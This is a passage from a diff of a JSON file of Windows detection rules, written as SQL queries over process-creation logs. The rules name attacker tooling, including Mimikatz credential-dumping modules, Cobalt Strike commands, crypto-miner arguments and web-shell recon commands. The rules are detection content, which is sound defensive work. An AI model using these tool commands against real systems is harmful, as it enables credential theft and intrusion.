'%VBoxDrv.sys%' ESCAPE '\\') OR (CommandLine LIKE '%startvm%' ESCAPE '\\' OR CommandLine LIKE '%controlvm%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\gpresult.exe' ESCAPE '\\' AND (CommandLine LIKE '%/z%' ESCAPE '\\' OR CommandLine LIKE '%/v%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_virtualbox_execution.yml" + "filename": "proc_creation_win_gpresult_execution.yml" }, { - "title": "Suspicious Parent of Csc.exe", - "id": "b730a276-6b63-41b8-bcf8-55930c8fc6ee", - "status": "test", - "description": "Detects a suspicious parent of csc.exe, which could by a sign of payload delivery", + "title": "Potential Crypto Mining Activity", + "id": "66c3b204-9f88-4d0a-a7f7-8a57d521ca55", + "status": "stable", + "description": "Detects command line parameters or strings often used by crypto miners", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.005", - "attack.t1059.007", - "attack.defense_evasion", - "attack.t1218.005", - "attack.t1027.004" + "attack.impact", + "attack.t1496" ], "falsepositives": [ - "Unknown" + "Legitimate use of crypto miners", + "Some build frameworks" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\csc.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '% --cpu-priority=%' ESCAPE '\\' OR CommandLine LIKE '%--donate-level=0%' ESCAPE '\\' OR CommandLine LIKE '% -o pool.%' ESCAPE '\\' OR CommandLine LIKE '% --nicehash%' ESCAPE '\\' OR CommandLine LIKE '% --algo=rx/0 %' ESCAPE '\\' OR CommandLine LIKE '%stratum+tcp://%' ESCAPE '\\' OR CommandLine LIKE '%stratum+udp://%' ESCAPE '\\' OR CommandLine LIKE '%LS1kb25hdGUtbGV2ZWw9%' ESCAPE '\\' OR CommandLine LIKE '%0tZG9uYXRlLWxldmVsP%' ESCAPE '\\' OR CommandLine LIKE '%tLWRvbmF0ZS1sZXZlbD%' ESCAPE '\\' OR CommandLine LIKE '%c3RyYXR1bSt0Y3A6Ly%' ESCAPE '\\' OR CommandLine LIKE '%N0cmF0dW0rdGNwOi8v%' ESCAPE '\\' OR CommandLine LIKE '%zdHJhdHVtK3RjcDovL%' ESCAPE '\\' OR CommandLine LIKE '%c3RyYXR1bSt1ZHA6Ly%' ESCAPE '\\' OR CommandLine LIKE '%N0cmF0dW0rdWRwOi8v%' ESCAPE '\\' OR CommandLine LIKE '%zdHJhdHVtK3VkcDovL%' ESCAPE '\\') AND NOT ((CommandLine LIKE '% pool.c %' ESCAPE '\\' OR CommandLine LIKE '% pool.o %' ESCAPE '\\' OR CommandLine LIKE '%gcc -%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_csc_susp_parent.yml" + "filename": "proc_creation_win_susp_crypto_mining_monero.yml" }, { - "title": "HackTool - CreateMiniDump Execution", - "id": "36d88494-1d43-4dc0-b3fa-35c8fea0ca9d", + "title": "Exploit for CVE-2017-8759", + "id": "fdd84c68-a1f6-47c9-9477-920584f94905", "status": "test", - "description": "Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine", + "description": "Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.execution", + "attack.t1203", + "attack.t1204.002", + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\CreateMiniDump.exe' ESCAPE '\\' OR Imphash = '4a07f944a83e8a7c2525efa35dd30e2f' OR Hashes LIKE '%IMPHASH=4a07f944a83e8a7c2525efa35dd30e2f%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' AND NewProcessName LIKE '%\\\\csc.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_createminidump.yml" + "filename": "proc_creation_win_exploit_cve_2017_8759.yml" }, { - "title": "LOLBIN Execution Of The FTP.EXE Binary", - "id": "06b401f4-107c-4ff9-947f-9ec1e7649f1e", + "title": "WSF/JSE/JS/VBA/VBE File Execution", + "id": "1e33157c-53b1-41ad-bbcc-780b80b58288", "status": "test", - "description": "Detects execution of ftp.exe script execution with the \"-s\" flag and any child processes ran by ftp.exe", - "author": "Victor Sergeev, oscd.community", + "description": "Detects suspicious file execution by wscript and cscript", + "author": "Michael Haag", "tags": [ "attack.execution", - "attack.t1059", - "attack.defense_evasion", - "attack.t1202" + "attack.t1059.005", + "attack.t1059.007" ], "falsepositives": [ - "Unknown" + "Will need to be tuned. I recommend adding the user profile path in CommandLine if it is getting too noisy." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\ftp.exe' ESCAPE '\\' OR ((NewProcessName LIKE '%\\\\ftp.exe' ESCAPE '\\' OR OriginalFileName = 'ftp.exe') AND CommandLine LIKE '%-s:%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName IN ('wscript.exe', 'cscript.exe') OR (NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\')) AND (CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.jse%' ESCAPE '\\' OR CommandLine LIKE '%.vba%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_ftp.yml" + "filename": "proc_creation_win_script_execution.yml" }, { - "title": "Suspicious GrpConv Execution", - "id": "f14e169e-9978-4c69-acb3-1cff8200bc36", - "status": "experimental", - "description": "Detects the suspicious execution of a utility to convert Windows 3.x .grp files or for persistence purposes by malicious software or actors", - "author": "Florian Roth (Nextron Systems)", + "title": "Tap Installer Execution", + "id": "99793437-3e16-439b-be0f-078782cf953d", + "status": "test", + "description": "Well-known TAP software installation. Possible preparation for data exfiltration using tunneling techniques", + "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", "tags": [ - "attack.persistence", - "attack.t1547" + "attack.exfiltration", + "attack.t1048" ], "falsepositives": [ - "Unknown" + "Legitimate OpenVPN TAP insntallation" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%grpconv.exe -o%' ESCAPE '\\' OR CommandLine LIKE '%grpconv -o%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\tapinstall.exe' ESCAPE '\\' AND NOT (((NewProcessName LIKE 'C:\\\\Program Files\\\\Avast Software\\\\SecureLine VPN\\\\tapinstall.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Avast Software\\\\SecureLine VPN\\\\tapinstall.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Program Files\\\\OpenVPN Connect\\\\drivers\\\\tap\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Proton Technologies\\\\ProtonVPNTap\\\\installer\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_susp_grpconv.yml" + "filename": "proc_creation_win_tapinstall_execution.yml" }, { - "title": "UAC Bypass Using IDiagnostic Profile", - "id": "4cbef972-f347-4170-b62a-8253f6168e6d", + "title": "Renamed Remote Utilities RAT (RURAT) Execution", + "id": "9ef27c24-4903-4192-881a-3adde7ff92a5", "status": "experimental", - "description": "Detects the \"IDiagnosticProfileUAC\" UAC bypass technique", + "description": "Detects execution of renamed Remote Utilities (RURAT) via Product PE header field", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.collection", + "attack.command_and_control", + "attack.discovery", + "attack.s0592" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% /Processid:{12C21EA7-2EB8-4B55-9249-AC243DA8C666}%' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND Product = 'Remote Utilities' AND NOT ((NewProcessName LIKE '%\\\\rutserv.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rfusclient.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_idiagnostic_profile.yml" + "filename": "proc_creation_win_renamed_rurat.yml" }, { - "title": "Webshell Detection With Command Line Keywords", - "id": "bed2a484-9348-4143-8a8a-b801c979301c", + "title": "Import PowerShell Modules From Suspicious Directories - ProcCreation", + "id": "c31364f7-8be6-4b77-8483-dd2b5a7b69a3", "status": "experimental", - "description": "Detects certain command line parameters often used during reconnaissance activity via web shells", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, Anton Kutepov, oscd.community", + "description": "Detects powershell scripts that import modules from suspicious directories", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1505.003", - "attack.t1018", - "attack.t1033", - "attack.t1087" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentProcessName LIKE '%-tomcat-%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND ((OriginalFileName IN ('net.exe', 'net1.exe') AND (CommandLine LIKE '% user %' ESCAPE '\\' OR CommandLine LIKE '% use %' ESCAPE '\\' OR CommandLine LIKE '% group %' ESCAPE '\\')) OR (OriginalFileName = 'ping.exe' AND CommandLine LIKE '% -n %' ESCAPE '\\') OR (CommandLine LIKE '%&cd&echo%' ESCAPE '\\' OR CommandLine LIKE '%cd /d %' ESCAPE '\\') OR (OriginalFileName = 'wmic.exe' AND CommandLine LIKE '% /node:%' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\quser.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pathping.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tracert.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netstat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tasklist.exe' ESCAPE '\\') OR OriginalFileName IN ('whoami.exe', 'sysinfo.exe', 'quser.exe', 'ipconfig.exe', 'pathping.exe', 'tracert.exe', 'netstat.exe', 'schtasks.exe', 'VSSADMIN.EXE', 'wevtutil.exe', 'tasklist.exe')) OR (CommandLine LIKE '% Test-NetConnection %' ESCAPE '\\' OR CommandLine LIKE '%dir \\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Import-Module \"$Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module ''$Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module $Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module \"$Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module ''$Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module $Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo \"$Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo ''$Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo $Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo \"$Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo ''$Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo $Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo C:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_webshell_detection.yml" + "filename": "proc_creation_win_powershell_import_module_susp_dirs.yml" }, { - "title": "HackTool - GMER Rootkit Detector and Remover Execution", - "id": "9082ff1f-88ab-4678-a3cc-5bcff99fc74d", - "status": "experimental", - "description": "Detects the execution GMER tool based on image and hash fields.", + "title": "PowerShell Get-Clipboard Cmdlet Via CLI", + "id": "b9aeac14-2ffd-4ad3-b967-1354a4e628c3", + "status": "test", + "description": "Detects usage of the 'Get-Clipboard' cmdlet via CLI", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.collection", + "attack.t1115" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\gmer.exe' ESCAPE '\\' OR (Hashes LIKE '%MD5=E9DC058440D321AA17D0600B3CA0AB04%' ESCAPE '\\' OR Hashes LIKE '%SHA1=539C228B6B332F5AA523E5CE358C16647D8BBE57%' ESCAPE '\\' OR Hashes LIKE '%SHA256=E8A3E804A96C716A3E9B69195DB6FFB0D33E2433AF871E4D4E1EAB3097237173%' ESCAPE '\\') OR md5 = 'e9dc058440d321aa17d0600b3ca0ab04' OR sha1 = '539c228b6b332f5aa523e5ce358c16647d8bbe57' OR sha256 = 'e8a3e804a96c716a3e9b69195db6ffb0d33e2433af871e4d4e1eab3097237173'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Get-Clipboard%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_gmer.yml" + "filename": "proc_creation_win_powershell_get_clipboard.yml" }, { - "title": "PowerShell Base64 Encoded WMI Classes", - "id": "1816994b-42e1-4fb1-afd2-134d88184f71", - "status": "experimental", - "description": "Detects calls to base64 encoded WMI class such as \"Win32_Shadowcopy\", \"\"...etc.", - "author": "Christian Burkard (Nextron Systems), Nasreddine Bencherchali", + "title": "Interactive AT Job", + "id": "60fc936d-2eb0-4543-8a13-911c750a1dfc", + "status": "test", + "description": "Detects an interactive AT job, which may be used as a form of privilege escalation.", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027" + "attack.privilege_escalation", + "attack.t1053.002" ], "falsepositives": [ - "Unknown" + "Unlikely (at.exe deprecated as of Windows 8)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND ((CommandLine LIKE '%VwBpAG4AMwAyAF8AUwBoAGEAZABvAHcAYwBvAHAAeQ%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBTAGgAYQBkAG8AdwBjAG8AcAB5A%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfU2hhZG93Y29we%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1NoYWRvd2NvcH%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9TaGFkb3djb3B5%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AUwBjAGgAZQBkAHUAbABlAGQASgBvAGIA%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFMAYwBoAGUAZAB1AGwAZQBkAEoAbwBiA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBTAGMAaABlAGQAdQBsAGUAZABKAG8AYg%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfU2NoZWR1bGVkSm9i%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1NjaGVkdWxlZEpvY%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9TY2hlZHVsZWRKb2%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcw%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzA%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfUHJvY2Vzc%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1Byb2Nlc3%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Qcm9jZXNz%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AVQBzAGUAcgBBAGMAYwBvAHUAbgB0A%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFUAcwBlAHIAQQBjAGMAbwB1AG4AdA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBVAHMAZQByAEEAYwBjAG8AdQBuAHQA%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfVXNlckFjY291bn%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1VzZXJBY2NvdW50%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Vc2VyQWNjb3Vud%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8ATABvAGcAZwBlAGQATwBuAFUAcwBlAHIA%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAEwAbwBnAGcAZQBkAE8AbgBVAHMAZQByA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBMAG8AZwBnAGUAZABPAG4AVQBzAGUAcg%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfTG9nZ2VkT25Vc2Vy%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX0xvZ2dlZE9uVXNlc%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Mb2dnZWRPblVzZX%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\at.exe' ESCAPE '\\' AND CommandLine LIKE '%interactive%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_base64_wmi_classes.yml" + "filename": "proc_creation_win_at_interactive_execution.yml" }, { - "title": "Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE", - "id": "37db85d1-b089-490a-a59a-c7b6f984f480", - "status": "test", - "description": "Detects usage of \"findstr\" with the argument \"385201\". Which could indicate potential discovery of an installed Sysinternals Sysmon service using the default driver altitude (even if the name is changed).", - "author": "frack113", + "title": "Operator Bloopers Cobalt Strike Modules", + "id": "4f154fb6-27d1-4813-a759-78b93e0b9c48", + "status": "experimental", + "description": "Detects Cobalt Strike module/commands accidentally entered in CMD shell", + "author": "_pete_0, TheDFIRReport", "tags": [ - "attack.discovery", - "attack.t1518.001" + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND CommandLine LIKE '% 385201%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'Cmd.Exe' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ShareFinder%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SMBAutoBrute%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR CommandLine LIKE '%zerologon%' ESCAPE '\\' OR CommandLine LIKE '%av\\_query%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_findstr_sysmon_discovery_via_default_altitude.yml" + "filename": "proc_creation_win_hktl_cobaltstrike_bloopers_modules.yml" }, { - "title": "Potential Recon Activity Via Nltest.EXE", - "id": "5cc90652-4cbd-4241-aa3b-4b462fa5a248", + "title": "Potential System Information Discovery Via Wmic.EXE", + "id": "9d5a1274-922a-49d0-87f3-8c653483b909", "status": "experimental", - "description": "Detects nltest commands that can be used for information discovery", - "author": "Craig Young, oscd.community, Georg Lauenstein", + "description": "Detects the use of the WMI command-line (WMIC) utility to identify and display various system information,\nincluding OS, CPU, GPU, and disk drive names; memory capacity; display resolution; and baseboard, BIOS,\nand GPU driver products/versions.\nSome of these commands were used by Aurora Stealer in late 2022/early 2023.\n", + "author": "TropChaud", "tags": [ "attack.discovery", - "attack.t1016", - "attack.t1482" + "attack.t1082" ], "falsepositives": [ - "Legitimate administration use but user and host must be investigated" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\nltest.exe' ESCAPE '\\' OR OriginalFileName = 'nltestrk.exe') AND ((CommandLine LIKE '%/server%' ESCAPE '\\' AND CommandLine LIKE '%/query%' ESCAPE '\\') OR (CommandLine LIKE '%/dclist:%' ESCAPE '\\' OR CommandLine LIKE '%/parentdomain%' ESCAPE '\\' OR CommandLine LIKE '%/domain\\_trusts%' ESCAPE '\\' OR CommandLine LIKE '%/all\\_trusts%' ESCAPE '\\' OR CommandLine LIKE '%/trusted\\_domains%' ESCAPE '\\' OR CommandLine LIKE '%/user%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'WMI Commandline Utility' OR OriginalFileName = 'wmic.exe' OR NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND (CommandLine LIKE '%cpu get name%' ESCAPE '\\' OR CommandLine LIKE '%MEMPHYSICAL get MaxCapacity%' ESCAPE '\\' OR CommandLine LIKE '%baseboard get product%' ESCAPE '\\' OR CommandLine LIKE '%baseboard get version%' ESCAPE '\\' OR CommandLine LIKE '%bios get SMBIOSBIOSVersion%' ESCAPE '\\' OR CommandLine LIKE '%path win32\\_VideoController get name%' ESCAPE '\\' OR CommandLine LIKE '%path win32\\_VideoController get DriverVersion%' ESCAPE '\\' OR CommandLine LIKE '%path win32\\_VideoController get VideoModeDescription%' ESCAPE '\\' OR CommandLine LIKE '%OS get Caption,OSArchitecture,Version%' ESCAPE '\\' OR CommandLine LIKE '%DISKDRIVE get Caption%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_nltest_recon.yml" + "filename": "proc_creation_win_wmic_recon_system_info_discovery.yml" }, { - "title": "HackTool - Mimikatz Execution", - "id": "a642964e-bead-4bed-8910-1bb4d63e3b4d", + "title": "PUA - Nmap/Zenmap Execution", + "id": "f6ecd1cf-19b8-4488-97f6-00f0924991a3", "status": "test", - "description": "Detection well-known mimikatz command line arguments", - "author": "Teymur Kheirkhabarov, oscd.community, David ANDRE (additional keywords), Tim Shelton", + "description": "Detects usage of namp/zenmap. Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "attack.t1003.006" + "attack.discovery", + "attack.t1046" ], "falsepositives": [ - "Unlikely" + "Network administrator computer" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%DumpCreds%' ESCAPE '\\' OR CommandLine LIKE '%mimikatz%' ESCAPE '\\') OR (CommandLine LIKE '%::aadcookie%' ESCAPE '\\' OR CommandLine LIKE '%::detours%' ESCAPE '\\' OR CommandLine LIKE '%::memssp%' ESCAPE '\\' OR CommandLine LIKE '%::mflt%' ESCAPE '\\' OR CommandLine LIKE '%::ncroutemon%' ESCAPE '\\' OR CommandLine LIKE '%::ngcsign%' ESCAPE '\\' OR CommandLine LIKE '%::printnightmare%' ESCAPE '\\' OR CommandLine LIKE '%::skeleton%' ESCAPE '\\' OR CommandLine LIKE '%::preshutdown%' ESCAPE '\\' OR CommandLine LIKE '%::mstsc%' ESCAPE '\\' OR CommandLine LIKE '%::multirdp%' ESCAPE '\\') OR (CommandLine LIKE '%rpc::%' ESCAPE '\\' OR CommandLine LIKE '%token::%' ESCAPE '\\' OR CommandLine LIKE '%crypto::%' ESCAPE '\\' OR CommandLine LIKE '%dpapi::%' ESCAPE '\\' OR CommandLine LIKE '%sekurlsa::%' ESCAPE '\\' OR CommandLine LIKE '%kerberos::%' ESCAPE '\\' OR CommandLine LIKE '%lsadump::%' ESCAPE '\\' OR CommandLine LIKE '%privilege::%' ESCAPE '\\' OR CommandLine LIKE '%process::%' ESCAPE '\\' OR CommandLine LIKE '%vault::%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\nmap.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\zennmap.exe' ESCAPE '\\') OR OriginalFileName IN ('nmap.exe', 'zennmap.exe')))" ], - "filename": "proc_creation_win_hktl_mimikatz_command_line.yml" + "filename": "proc_creation_win_pua_nmap_zenmap.yml" }, { - "title": "Sticky Key Like Backdoor Execution", - "id": "2fdefcb3-dbda-401e-ae23-f0db027628bc", - "status": "test", - "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", - "author": "Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community", + "title": "HackTool - GMER Rootkit Detector and Remover Execution", + "id": "9082ff1f-88ab-4678-a3cc-5bcff99fc74d", + "status": "experimental", + "description": "Detects the execution GMER tool based on image and hash fields.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.008", - "car.2014-11-003", - "car.2014-11-008" + "attack.defense_evasion" ], "falsepositives": [ "Unlikely" ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\winlogon.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wt.exe' ESCAPE '\\') AND (CommandLine LIKE '%sethc.exe%' ESCAPE '\\' OR CommandLine LIKE '%utilman.exe%' ESCAPE '\\' OR CommandLine LIKE '%osk.exe%' ESCAPE '\\' OR CommandLine LIKE '%Magnify.exe%' ESCAPE '\\' OR CommandLine LIKE '%Narrator.exe%' ESCAPE '\\' OR CommandLine LIKE '%DisplaySwitch.exe%' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_cmd_sticky_key_like_backdoor_execution.yml" - }, - { - "title": "Suspicious Rundll32 Activity", - "id": "e593cf51-88db-4ee1-b920-37e89012a3c9", 